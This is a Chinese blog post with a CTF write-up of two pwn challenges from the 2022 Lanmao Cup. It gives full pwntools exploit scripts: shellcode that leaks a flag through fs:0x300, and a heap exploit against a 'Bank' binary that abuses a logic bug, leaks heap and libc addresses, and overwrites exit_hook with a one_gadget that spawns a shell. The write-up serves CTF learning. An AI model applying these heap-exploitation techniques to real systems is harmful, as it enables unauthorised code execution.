<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="蓝帽杯2022 pwn题复现">
<meta property="og:type" content="article">
<meta property="og:title" content="蓝帽杯2022pwn题">
<meta property="og:url" content="http://example.com/2022/07/18/%E8%93%9D%E5%B8%BD%E6%9D%AF2022/index.html">
<meta property="og:site_name" content="Leof&#39;s blog">
<meta property="og:description" content="蓝帽杯2022 pwn题复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022717/1658099627939-0c5757f2-5b07-4d0c-ad48-f719d31107e4.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022717/1658099712727-93ac7205-e778-496f-87e8-3a2919c694ab.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022717/1658099772088-8743a1eb-b31c-448c-b590-c40d7df1571f.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022718/1658110355413-2e0a4287-468d-4114-80c7-212e16a0cc69.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022718/1658111854350-7dedbb0a-6cbb-4bed-acea-d6d87a3a8a32.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022718/1658112062741-03d68d80-67ca-45f1-94e4-177ad4960c8d.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022718/1658112143486-1864e041-c691-4bd4-9410-1af03686cb73.jpg">
<meta property="og:image" content="https://c.img.dasctf.com/images/2022718/1658143080450-f39ad1e4-b013-421c-8653-4b1ec53bf6ce.jpg">
<meta property="article:published_time" content="2022-07-17T23:07:31.000Z">
<meta property="article:modified_time" content="2023-03-31T14:57:13.860Z">
<meta property="article:author" content="Leof">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="蓝帽杯2022">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://c.img.dasctf.com/images/2022717/1658099627939-0c5757f2-5b07-4d0c-ad48-f719d31107e4.jpg">

<link rel="canonical" href="http://example.com/2022/07/18/%E8%93%9D%E5%B8%BD%E6%9D%AF2022/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>蓝帽杯2022pwn题 | Leof's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Leof's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/07/18/%E8%93%9D%E5%B8%BD%E6%9D%AF2022/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Leof">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Leof's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          蓝帽杯2022pwn题
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-07-18 07:07:31" itemprop="dateCreated datePublished" datetime="2022-07-18T07:07:31+08:00">2022-07-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-03-31 22:57:13" itemprop="dateModified" datetime="2023-03-31T22:57:13+08:00">2023-03-31</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/writeup/" itemprop="url" rel="index"><span itemprop="name">writeup</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>蓝帽杯2022 pwn题复现</p>
<span id="more"></span>

<h1 id="EscapeShellcode"><a href="#EscapeShellcode" class="headerlink" title="EscapeShellcode"></a>EscapeShellcode</h1><p><img src="https://c.img.dasctf.com/images/2022717/1658099627939-0c5757f2-5b07-4d0c-ad48-f719d31107e4.jpg"></p>
<p>只允许read和write</p>
<p><img src="https://c.img.dasctf.com/images/2022717/1658099712727-93ac7205-e778-496f-87e8-3a2919c694ab.jpg"></p>
<p>程序将根目录下的flag读入到bss段的flag变量中</p>
<p><img src="https://c.img.dasctf.com/images/2022717/1658099772088-8743a1eb-b31c-448c-b590-c40d7df1571f.jpg"></p>
<p>这里输入shellcode并执行，执行之前会将除了rip之外的寄存器全部清除</p>
<p>程序开启了pie，这里采用泄露地址的方法拿到flag的地址，然后直接write出来</p>
<p><img src="https://c.img.dasctf.com/images/2022718/1658110355413-2e0a4287-468d-4114-80c7-212e16a0cc69.jpg"></p>
<p>在fs + 0x300处有一个栈地址可以泄露</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">banary = <span class="string">&quot;./pwn&quot;</span></span><br><span class="line">elf = ELF(banary)</span><br><span class="line">ip = <span class="string">&#x27;106.54.163.94&#x27;</span></span><br><span class="line">port = <span class="number">20000</span></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    io = process(banary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(ip, port)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(io)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">s = <span class="keyword">lambda</span> data : io.send(data)</span><br><span class="line">sl = <span class="keyword">lambda</span> data : io.sendline(data)</span><br><span class="line">sa = <span class="keyword">lambda</span> text, data : io.sendafter(text, data)</span><br><span class="line">sla = <span class="keyword">lambda</span> text, data : io.sendlineafter(text, data)</span><br><span class="line">r = <span class="keyword">lambda</span> : io.recv()</span><br><span class="line">ru = <span class="keyword">lambda</span> text : io.recvuntil(text)</span><br><span class="line">uu32 = <span class="keyword">lambda</span> : u32(io.recvuntil(<span class="string">b&quot;\xff&quot;</span>)[-<span class="number">4</span>:].ljust(<span class="number">4</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64 = <span class="keyword">lambda</span> : u64(io.recvuntil(<span class="string">b&quot;\x7f&quot;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">lg = <span class="keyword">lambda</span> addr : log.info(addr)</span><br><span class="line">ia = <span class="keyword">lambda</span> : io.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">xor rsi,rsi;</span></span><br><span class="line"><span class="string">mov rsi, fs:[0x300];</span></span><br><span class="line"><span class="string">mov rsi, [rsi];</span></span><br><span class="line"><span class="string">add rsi, 0x2b90;</span></span><br><span class="line"><span class="string">xor rdi, rdi;</span></span><br><span class="line"><span class="string">xor rdx, rdx;</span></span><br><span class="line"><span class="string">mov rdi, 1;</span></span><br><span class="line"><span class="string">mov rdx, 0x30;</span></span><br><span class="line"><span class="string">mov rax, 1;</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">payload = asm(shellcode)</span><br><span class="line">sl(payload)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>

<h1 id="Bank"><a href="#Bank" class="headerlink" title="Bank"></a>Bank</h1><p><img src="https://c.img.dasctf.com/images/2022718/1658111854350-7dedbb0a-6cbb-4bed-acea-d6d87a3a8a32.jpg"></p>
<p>取钱的函数里存在逻辑漏洞，当取的钱和账户里剩余的钱相等时，不会扣钱，这里存钱和取钱结合就能刷很多钱了</p>
<p>向hacker转钱时可以free任意地址</p>
<p><img src="https://c.img.dasctf.com/images/2022718/1658112062741-03d68d80-67ca-45f1-94e4-177ad4960c8d.jpg"></p>
<p>向admin转钱可以泄露堆地址</p>
<p><img src="https://c.img.dasctf.com/images/2022718/1658112143486-1864e041-c691-4bd4-9410-1af03686cb73.jpg"></p>
<p>这里的话需要利用relloc的特性</p>
<ol>
<li>对ptr进行判断，如果ptr为NULL，则函数相当于malloc(new_size),试着分配一块大小为new_size的内存，如果成功将地址返回，否则返回NULL。如果ptr不为NULL，则进入2</li>
<li>查看ptr是不是在堆中，如果不是的话会跑出异常错误，会发生realloc invalid pointer。如果ptr在堆中，则查看new_size大小，如果new_size大小为0，则相当于free(ptr)，将ptr指针释放，返回NULL，如果new_size小于原大小，则ptr中的数据可能会丢失，只有new_size大小的数据会保存（这里很重要），如果size等于原大小，等于啥都没做，如果size大于原大小，则看ptr所在的位置还有没有足够的连续内存空间，如果有的话，分配更多的空间，返回的地址和ptr相同，如果没有的话，则会使用malloc分配更大的内存，将旧的内容拷贝到新的内存中，把旧的内存free掉，则返回新地址，否则返回NULL。</li>
</ol>
<p>在realloc了一块空间后，再realloc一块更小的这样就能达到free的效果，从而泄露堆地址</p>
<p>因为可以free任意地址，所以可以直接伪造unsorted bin大小的chunk来达到泄露libc的效果</p>
<p><img src="https://c.img.dasctf.com/images/2022718/1658143080450-f39ad1e4-b013-421c-8653-4b1ec53bf6ce.jpg"></p>
<p>最后向abyss转钱将exit_hook改成one_gadget</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">banary = <span class="string">&quot;./Bank&quot;</span></span><br><span class="line">elf = ELF(banary)</span><br><span class="line">ip = <span class="string">&#x27;106.54.163.94&#x27;</span></span><br><span class="line">port = <span class="number">20000</span></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    io = process(banary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = remote(ip, port)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(io)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">s = <span class="keyword">lambda</span> data : io.send(data)</span><br><span class="line">sl = <span class="keyword">lambda</span> data : io.sendline(data)</span><br><span class="line">sa = <span class="keyword">lambda</span> text, data : io.sendafter(text, data)</span><br><span class="line">sla = <span class="keyword">lambda</span> text, data : io.sendlineafter(text, data)</span><br><span class="line">r = <span class="keyword">lambda</span> : io.recv()</span><br><span class="line">ru = <span class="keyword">lambda</span> text : io.recvuntil(text)</span><br><span class="line">uu32 = <span class="keyword">lambda</span> : u32(io.recvuntil(<span class="string">b&quot;\xff&quot;</span>)[-<span class="number">4</span>:].ljust(<span class="number">4</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64 = <span class="keyword">lambda</span> : u64(io.recvuntil(<span class="string">b&quot;\x7f&quot;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">lg = <span class="keyword">lambda</span> addr : log.info(addr)</span><br><span class="line">ia = <span class="keyword">lambda</span> : io.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Login</span>():</span><br><span class="line">    sla(<span class="string">b&#x27;Click: &#x27;</span>, <span class="string">b&#x27;Login&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;1&#x27;</span> * <span class="number">0x10</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;123456&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Put</span>(<span class="params">money</span>):      </span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Put&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="built_in">str</span>(money))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Dep</span>(<span class="params">money</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Deposit&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="built_in">str</span>(money))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">admin</span>(<span class="params">money</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Transfer&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;admin&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="built_in">str</span>(money))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">ptr</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Transfer&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;hacker&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;52&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;!&#x27;</span>, <span class="built_in">str</span>(ptr))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">relloc</span>(<span class="params">size</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Transfer&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;ghost&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;11&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;)&#x27;</span>, <span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">abyss</span>(<span class="params">con</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Transfer&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;abyss&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">    sl(<span class="built_in">str</span>(con))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">malloc_0x10</span>(<span class="params">con</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;: &#x27;</span>, <span class="string">b&#x27;Transfer&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;guest&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;? &#x27;</span>, <span class="string">b&#x27;6&#x27;</span>)</span><br><span class="line">    sa(<span class="string">b&#x27;: &#x27;</span>, con)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">money = <span class="number">0x100</span></span><br><span class="line">Login()</span><br><span class="line"></span><br><span class="line"><span class="comment">#get more money</span></span><br><span class="line">Put(<span class="number">0x100</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    Dep(money)</span><br><span class="line">    Put(money)</span><br><span class="line">    money *= <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    malloc_0x10(<span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line"><span class="comment"># leak heap</span></span><br><span class="line">relloc(<span class="number">0x100</span>)</span><br><span class="line">relloc(<span class="number">1</span>)</span><br><span class="line">admin(<span class="number">0x148</span> // <span class="number">8</span>)</span><br><span class="line">ru(<span class="string">b&#x27;think &#x27;</span>)</span><br><span class="line">heap = <span class="built_in">int</span>(io.recv(<span class="number">14</span>), <span class="number">16</span>) - <span class="number">0x10</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap))</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak libc</span></span><br><span class="line">malloc_0x10(p64(<span class="number">0</span>) + p64(<span class="number">0x421</span>))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">34</span>):</span><br><span class="line">    malloc_0x10(p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>))</span><br><span class="line"></span><br><span class="line">delete(heap + <span class="number">0x4e0</span>)</span><br><span class="line">admin(<span class="number">0x240</span> // <span class="number">8</span>)</span><br><span class="line">ru(<span class="string">b&#x27;think &#x27;</span>)</span><br><span class="line">libcbase = <span class="built_in">int</span>(io.recv(<span class="number">14</span>), <span class="number">16</span>) - <span class="number">0x1ebbe0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libcbase))</span><br><span class="line">exit_hook = libcbase + <span class="number">0x1f5150</span></span><br><span class="line">one = libcbase + <span class="number">0xe6af4</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0xe6aee execve(&quot;/bin/sh&quot;, r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6af1 execve(&quot;/bin/sh&quot;, r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6af4 execve(&quot;/bin/sh&quot;, rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string">  [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(exit_hook))</span><br><span class="line"></span><br><span class="line">delete(heap + <span class="number">0x2a0</span>)</span><br><span class="line">malloc_0x10(p64(exit_hook) * <span class="number">2</span>)</span><br><span class="line">abyss(one)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>

<p>参考链接</p>
<p><a target="_blank" rel="noopener" href="https://blog.e4l4.com/posts/%E8%93%9D%E5%B8%BD%E6%9D%AF/#bankexit_hook">https://blog.e4l4.com/posts/%E8%93%9D%E5%B8%BD%E6%9D%AF/#bankexit_hook</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/writeup/" rel="tag"># writeup</a>
              <a href="/tags/%E8%93%9D%E5%B8%BD%E6%9D%AF2022/" rel="tag"># 蓝帽杯2022</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/07/01/tcache/" rel="prev" title="tcache利用思路总结">
      <i class="fa fa-chevron-left"></i> tcache利用思路总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/07/23/DSCTF/" rel="next" title="DSCTF">
      DSCTF <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#EscapeShellcode"><span class="nav-number">1.</span> <span class="nav-text">EscapeShellcode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Bank"><span class="nav-number">2.</span> <span class="nav-text">Bank</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
